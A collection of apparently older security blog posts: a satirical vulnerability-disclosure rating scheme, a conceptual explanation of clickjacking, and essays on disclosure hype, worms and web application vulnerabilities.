…seven of the most common vulnerabilities that plague web applications.
Vulnerability disclosure presents a complex challenge to the information security community. A reductionist explanation of disclosure arguments need only present two claims. One end of the spectrum goes, “Only the vendor need know so no one else knows the problem exists, which means no one can exploit it.” The information-wants-to-be-free diametric opposition simply states, “Tell everyone as soon as the vulnerability is discovered”.
The Factor of Ultimate Doom (FUD) is a step towards reconciling this spectrum into a laser-focused compromise of agreement. It establishes a metric for evaluating the absolute danger inherent to a vulnerability, thus providing the discoverer with guidance on how to reveal the vulnerability.
The Factor is calculated by simple addition across three axes: Resources Expected, Protocol Affected, and Overall Impact. Vulnerabilities that do not meet any of the Factor’s criteria may be classified under the Statistically Irrelevant Concern metric, which will be explored at a later date.
(2) Exploit shellcode requires fewer than 12 bytes. In other words, it must be more efficient than the export PS1=# hack (to which many operating systems, including OS X, remain vulnerable)
(1) Exploit shellcode requires a GROSS sled. (A GROSS sled uses opcode 144 on Intel x86 processors, whereas the more well-known NOP sled uses opcode 0x90.)
(3) The Common Porn Interchange Protocol (TCP/IP)
(2) Multiple online rhetorical opinion networks
(1) Social networks
(3) Control every computer on the planet
(2) Destroy every computer on the planet
(1) Destroy another planet (obviously, the Earth’s internet would not be affected — making this a minor concern)
The resulting value is measured against an Audience Rating to determine how the vulnerability should be disclosed. This provides a methodology for verifying that a vulnerability was responsibly disclosed.
Audience Rating (by Factor of Ultimate Doom*)
(> 6) Can only be revealed at a security conference
(< 6) Cannot be revealed at a security conference
(< 0) Doesn’t have to be revealed; it’s just that dangerous
(*Due to undisclosed software patent litigation, values equal to 6 are ignored.)
So, I was asked to comment about clickjacking today. Technically, it isn’t a new vulnerability (IE6 fixed a variant in 2004, Firefox fixed a variant in September 2008), but a refinement of previous exploits and ennobled with a catchier name. It gained widespread coverage in October 2008 prior to the OWASP NYC conference when Jeremiah Grossman and Robert Hansen first said they would describe the vulnerability, then cancelled their talk for fear of unleashing Yet Another Exploit of Ultimate Doom.* The updated technique combines devious DOM manipulation with well-established attack patterns to make a respectable type of attack.
Clickjacking tricks a user into clicking on an attacker-supplied page while the user only sees the appearance and effect of clicking on a plain link. The attacker identifies an area in the target HTML that should receive the click event. This HTML is placed within an IFRAME such that the X and Y offsets of the frame place the target area in the upper left-hand corner of the frame’s visible area. This target IFRAME is visually hidden from the user (though the element remains part of the DOM). Then, the IFRAME is set within a second page (the content of which doesn’t matter) beneath the mouse cursor and, very importantly, dynamically moves to always be underneath the mouse. Then, when the user clicks somewhere within the second page the click is actually sent to the target area even though it appears to the user that the mouse is only above some innocuous link.Essentially, an attacker chooses some web page that, if the victim clicked some point (link, button, etc.) on that page, would produce some benefit to the attacker (e.g. generate click-fraud revenue, change a security setting, etc.). Next, the attacker takes the target page and places a second, innocuous page over it. The trick is to get the victim to make a mouse click on what appeared to be the innocuous page, but was actually an invisible element of the target page that has been automatically, but invisbly, placed beneath the cursor.The attack relies on luring a user to a server under the attacker’s control or a site that has been compromised by the attacker. Web site owners who ensure their site is free of cross-site scripting or other vulnerabilities can prevent their sites from being used as a relay point for the attacker. Yet other successful attacks, such as phishing, also rely on luring users to a server under the attacker’s control. The relative success of phishing implies that just securing web applications at the server isn’t the only solution because users can be tricked into visiting malicious web sites.The core of the attack occurs in the browser, which is where the real fix needs to appear. The problem is that browsers are intended to handle HTML from many sources and provide mechanisms to manipulate the location and visibility of elements within a web page. Consequently, any solution would have to block this attack while not inhibiting legitimate uses of this functionality.
In 1998, L0pht claimed before Congress that in under 30 minutes their seven member group could make online porn and Trek fan sites unusable for several days. (That’s all that existed on the Internet in 1998.) In February 2002 an SNMP vulnerability threatened the very fabric of space and time (at least as it related to porn and Trek fan sites — if you still don’t believe me, consider that Google added Klingon language support the same month). More recently, a DNS vulnerability was (somewhat re-)discovered that could enable attackers to redirect traffic going to sites like google.com and wikipedia.com to sites that served porn, even though many people wouldn’t notice the difference. (Dan Kaminsky compiled a list of other apocalyptic vulnerabilities similar to the issues that plagued DNS.)
This year at the OWASP NYC AppSec 2008 Conference Jeremiah Grossman and Robert “RSnake” Hansen shared another vulnerability, clickjacking, in the Voldemort “He Who Must Not Be Named” style. In other words, yet another eschatonic vulnerability existed, but its details could not be shared. This disclosure method continued the trend from Black Hat 2008 prior to which the media and security discussion lists talked about the secretly-held, unsecretly-guessed DNS vulnerability information with the speculation usually retained for important things like when Gn’Fn’R would finally release Chinese Democracy. [If you don’t care about gory details of the disclosure drama and just want to skim the abattoir, then read this summary.]
[This was originally posted August 2003 on the now-defunct vulns.com site before the Samy worm and sophisticated XSS attacks appeared. In the five years since this was first posted, web applications still struggle with fixing XSS and SQL injection vulnerabilities. In fact, it’s still possible to discover web sites that put raw SQL statements in URL parameters.]
With the advent of the Windows RPC-based worm, security pros once again loudly lament the lack of patched servers, security-aware power users once again loudly blast Microsoft for (insert favorite negative adverb here) written code, and company parking lots at midnight still have a few sticker-laden cars of sysadmins fixing the problem. Of course, there are a few differences such as Joe and Jane’s home computers have been caught red-handed showing vulnerable ports (unlike SQL Slammer or the IIS worm of the month which targeted servers not usually found in home networks), but the usual suspects still linger.
In fact, we could diverge onto many different topics when talking about worms. For starters, what’s the point of arguing against full disclosure when worms arise weeks (SQL Slammer, our RPC friend) or months (Nimda and Code Red) AFTER the patch has been released? Obviously, that sidesteps many arguments against full-disclosure but it’s food for thought. What about the plethora of port scanners and one-time “freebie scanners” that security companies pump out to capitalize the hysteria? Yes, there are administrators who don’t know what’s on their network, but I’m willing to bet there’s a larger number of administrators trying to figure out how to test, update, and manage a patch for 100, 1,000, or 5,000+ systems. You can’t release a patch and expect it to be applied to 1,000 servers within 24 hours. The tools to manage the patch process are too few, while the number of scanners is overwhelming. That’s not to say that security scanning isn’t necessary — it’s just a small part of the process. Administrators need help with patch testing, installation, and management.
Okay, so I’ve diverged onto a few topics already; but the one I wanted to highlight is what happens when a worm exploits a Web Application vulnerability? Cgisecurity.com has a nice essay on one concept of such a worm. How easily could one spread? It may not be hard with a SQL injection and xp_cmdshell(). Who will be the scapegoat? It probably won’t involve cute references to “Billy Gates.” You can’t blame administrators for not being able to download a universal patch (although some ISAPI filters or Apache modules could prevent a lot of attacks). In the end, you have to return to the programmers. They must be aware that Web applications have vulnerabilities that don’t fall into the bloated category of “Buffer Overflow.”
Buffer overflows are sexy to report when they involve popular software. Plus, it’s nice to see a group doing security research for fun. Yet when a worm finally targets Web applications, nmap and vulnerability scanners in the nature of nikto or nessus probably won’t cut it when administrators want to check if their Web applications are vulnerable. Instead, they’ll want web application-aware tools to check live systems and code review tools to audit the source code. The proliferation of buffer overflows has led to some useful code review tools and compilers that can spot a minority of potential overflow vulnerabilities. The OWASP is a good start. Hopefully, the tools to audit web applications and review source code will reach a point so that the next worm won’t spread through e-commerce applications. Everyone talks about how much worse a buffer overflow-based worm could have been, but a worm that gathers passwords and collects credit card numbers from an e-commerce application has more implications for the average Internet user than a worm erasing a company’s hard drives.
[This was originally posted July 2003 on the now-defunct vulns.com site. Even several years later no web application scanner can automatically identify such vulnerabilities in a reliable, accurate manner — many vulnerabilities still require human analysis.]
Sit and listen to Pink Floyd’s album, Wish You Were Here. “Can you tell a green field from a cold steel rail?” Yes. Could you tell a buffer overflow from a valid username in a Web application? Yes again. What about SQL injection, cross-site scripting, directory traversal attacks, or appending “.bak” to every file? Once again, Yes. In fact, many of these attacks have common signatures that could be thrown into Snort or passed through a simple grep command when examining application log files. These are the vulnerabilities that are reported most often on sites like www.cgisecurity.com or www.securityfocus.com. And they pop up for good reason: they’re dangerous and quickly cripple an e-commerce application.